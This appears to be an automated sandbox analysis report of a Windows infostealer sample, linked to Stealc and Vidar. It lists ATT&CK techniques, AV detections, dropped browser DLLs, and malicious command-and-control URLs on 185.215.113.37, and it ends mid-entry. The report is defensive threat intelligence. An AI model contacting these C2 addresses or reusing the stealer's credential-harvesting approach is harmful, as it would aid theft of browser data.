Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	651 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	33 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	33 Virtualization/Sandbox Evasion	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	45%	ReversingLabs	Win32.Trojan.Generic
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\vcruntime140[1].dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://www.sqlite.org/copyright.html.	0%	URL Reputation	safe
https://mozilla.org0/	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
https://support.mozilla.org	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://185.215.113.37/	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpxC	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/nss3.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/mozglue.dllH	100%	Avira URL Cloud	malware
http://185.215.113.37	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phprowser	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpnd9f1	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpainnet	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/softokn3.dll:	100%	Avira URL Cloud	malware
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5	0%	Avira URL Cloud	safe
http://185.215.113.37/0d60be0de163924d/freebl3.dll0	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/mozglue.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpgr	100%	Avira URL Cloud	malware
http://185.215.113.37e2b1563c6670f193.phption:	0%	Avira URL Cloud	safe
http://185.215.113.37/0d60be0de163924d/softokn3.dll&	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/freebl3.dll	100%	Avira URL Cloud	malware
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GNzbMA16ssY5	0%	Avira URL Cloud	safe
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta	0%	Avira URL Cloud	safe
http://185.215.113.37/0d60be0de163924d/softokn3.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpti	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpf	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phption:	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.php	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpi	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpg	100%	Avira URL Cloud	malware
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
http://185.215.113.37/0d60be0de163924d/freebl3.dllr	100%	Avira URL Cloud	malware
http://www.mozilla.com/en-US/blocklist/	0%	Avira URL Cloud	safe
http://185.215.113.37/0d60be0de163924d/mozglue.dll8L	100%	Avira URL Cloud	malware
http://185.215.113.37/2M	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpmo	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/msvcp140.dllT	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpirefox	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/sqlite3.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/msvcp140.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.php=C	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/msvcp140.dllF	100%	Avira URL Cloud	malware
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.	0%	Avira URL Cloud	safe
http://185.215.113.37/e2b1563c6670f193.phpin	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpem	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpwsApps	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.php5	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/softokn3.dllh	100%	Avira URL Cloud	malware
https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u	0%	Avira URL Cloud	safe
http://185.215.113.37/0d60be0de163924d/msvcp140.dllZ	100%	Avira URL Cloud	malware
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg	0%	Avira URL Cloud	safe
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	0%	Avira URL Cloud	safe

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.37/	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.php	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dll	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	EGDGIIJJ.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpxC	file.exe, 00000000.00000002.1591151333.00000000015A3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/ac/?q=	EGDGIIJJ.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dllH	file.exe, 00000000.00000002.1591151333.00000000015D5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpnd9f1	file.exe, 00000000.00000002.1591151333.0000000001550000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000002.1591151333.00000000015D5000.00000004.00000020.00020000.00000000.sdmp, EGDGIIJJ.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37	file.exe, 00000000.00000002.1591151333.000000000155E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpainnet	file.exe, 00000000.00000002.1591151333.00000000015BB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5	file.exe, 00000000.00000002.1608618062.0000000029811000.00000004.00000020.00020000.00000000.sdmp, AFIEGCAECGCAEBFHDHIE.0.dr	false	Avira URL Cloud: safe	unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dll:	file.exe, 00000000.00000002.1591151333.00000000015D5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phprowser	file.exe, 00000000.00000002.1591151333.00000000015D5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dll0	file.exe, 00000000.00000002.1591151333.00000000015D5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpgr	file.exe, 00000000.00000002.1591151333.0000000001550000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dll&	file.exe, 00000000.00000002.1591151333.00000000015D5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37e2b1563c6670f193.phption:	file.exe, 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000002.1591151333.00000000015D5000.00000004.00000020.00020000.00000000.sdmp, EGDGIIJJ.0.dr	false	URL Reputation: safe	unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta	file.exe, 00000000.00000002.1608618062.0000000029811000.00000004.00000020.00020000.00000000.sdmp, AFIEGCAECGCAEBFHDHIE.0.dr	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GNzbMA16ssY5	FHJDGHIJDGCBAAAAAFIJDAECGH.0.dr	false	Avira URL Cloud: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phption:	file.exe, 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpti	file.exe, 00000000.00000002.1591151333.0000000001550000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpf	file.exe, 00000000.00000002.1591151333.0000000001550000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpi	file.exe, 00000000.00000002.1591151333.00000000015A3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.sqlite.org/copyright.html.	file.exe, 00000000.00000002.1603347094.000000001D74F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1614031262.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpg	file.exe, 00000000.00000002.1591151333.0000000001550000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dllr	file.exe, 00000000.00000002.1591151333.00000000015D5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dll8L	file.exe, 00000000.00000002.1591151333.00000000015D5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.mozilla.com/en-US/blocklist/	file.exe, file.exe, 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	false	Avira URL Cloud: safe	unknown
https://mozilla.org0/	freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	EGDGIIJJ.0.dr	false	Avira URL Cloud: safe	unknown
http://185.215.113.37/2M	file.exe, 00000000.00000002.1591151333.00000000015BB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpirefox	file.exe, 00000000.00000002.1591151333.00000000015D5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dllT	file.exe, 00000000.00000002.1591151333.00000000015D5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	EGDGIIJJ.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpmo	file.exe, 00000000.00000002.1591151333.0000000001550000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.ecosia.org/newtab/	file.exe, 00000000.00000002.1591151333.00000000015D5000.00000004.00000020.00020000.00000000.sdmp, EGDGIIJJ.0.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	FHJDGHIJDGCBAAAAAFIJDAECGH.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dllF	file.exe, 00000000.00000002.1591151333.00000000015D5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.	file.exe, 00000000.00000002.1608618062.0000000029811000.00000004.00000020.00020000.00000000.sdmp, AFIEGCAECGCAEBFHDHIE.0.dr	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	file.exe, 00000000.00000002.1591151333.00000000015D5000.00000004.00000020.00020000.00000000.sdmp, EGDGIIJJ.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.php=C	file.exe, 00000000.00000002.1591151333.0000000001550000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpin	file.exe, 00000000.00000002.1591151333.0000000001550000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpem	file.exe, 00000000.00000002.1591151333.0000000001550000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	file.exe, 00000000.00000002.1608618062.0000000029811000.00000004.00000020.00020000.00000000.sdmp, AFIEGCAECGCAEBFHDHIE.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.php5	file.exe, 00000000.00000002.1591151333.00000000015A3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dllh	file.exe, 00000000.00000002.1591151333.00000000015D5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpwsApps	file.exe, 00000000.00000002.1591151333.00000000015D5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u	file.exe, 00000000.00000002.1608618062.0000000029811000.00000004.00000020.00020000.00000000.sdmp, AFIEGCAECGCAEBFHDHIE.0.dr	false	Avira URL Cloud: safe	unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dllZ	file.exe, 00000000.00000002.1591151333.00000000015D5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg	file.exe, 00000000.00000002.1608618062.0000000029811000.00000004.00000020.00020000.00000000.sdmp, AFIEGCAECGCAEBFHDHIE.0.dr	false	Avira URL Cloud: safe	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	AFIEGCAECGCAEBFHDHIE.0.dr	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org	FHJDGHIJDGCBAAAAAFIJDAECGH.0.dr	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	EGDGIIJJ.0.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.37	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1519854
Start date and time:	2024-09-27 01:27:10 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/23@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 86% Number of executed functions: 79 Number of non-executed functions: 101
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.37	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey, DarkTortilla	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
C:\ProgramData\mozglue.dll	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\AFIEGCAECGCAEBFHDHIE

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1765), with CRLF line terminators
Category:	dropped
Size (bytes):	9526
Entropy (8bit):	5.515924904533179
Encrypted:	false
SSDEEP:	192:efniR4oYbBp6Sp0pUhUxaXd6Y4nysZM2WklbBNBw8DUSl:hejGpCUvY4ysn7tpwx0
MD5:	4580799F1DC5720A7EC1766400E98740
SHA1:	92FD30F47EC545245B934EA492B3C64D5E609AA9
SHA-256:	57F457D69933E9E8A98C32A05EEE96171419977D45AFFA674A9761556656B9FA
SHA-512:	C0787F6584D1D26EBFD5AE59F32046CF1FF5AD1BEB1443F2FE93EB89EFA2F216CBC98E101BA3E38A2837ED9411A9DE1370E29ED96E83D8096547E53FEE964567
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "d3d72102-142d-47cc-a7b7-5b20541f2540");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696496527);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696496528);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\DGHDHIDG

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1221538113908904
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
MD5:	C1AE02DC8BFF5DD65491BF71C0B740A7
SHA1:	6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
SHA-256:	CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
SHA-512:	01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EGDGIIJJ

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1371207751183456
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cF/I4:MnlyfnGtxnfVuSVumEHFw4
MD5:	643AC1E34BE0FDE5FA0CD279E476DF3A
SHA1:	241B9EA323D640B82E8085803CBE3F61FEEA458F
SHA-256:	C44B4270F1F0B4FCB13533D2FC023443DBAFB24D355286C6AE1493DBCD96B7E2
SHA-512:	73D0F938535D93CC962EF752B1544FA8A2E4194C8979FB4778D0B84B70D32C6EDF8CC8559C9CEFBAF9681FB3BC1D345086AFCA4CA5FC8FB88100E48679AB1EF8
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FCAFIJJJKEGIECAKKEHIDHDAKK

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FHJDGHIJDGCBAAAAAFIJDAECGH

Download File

Process:	C:\Users\user\Desktop\file.exe
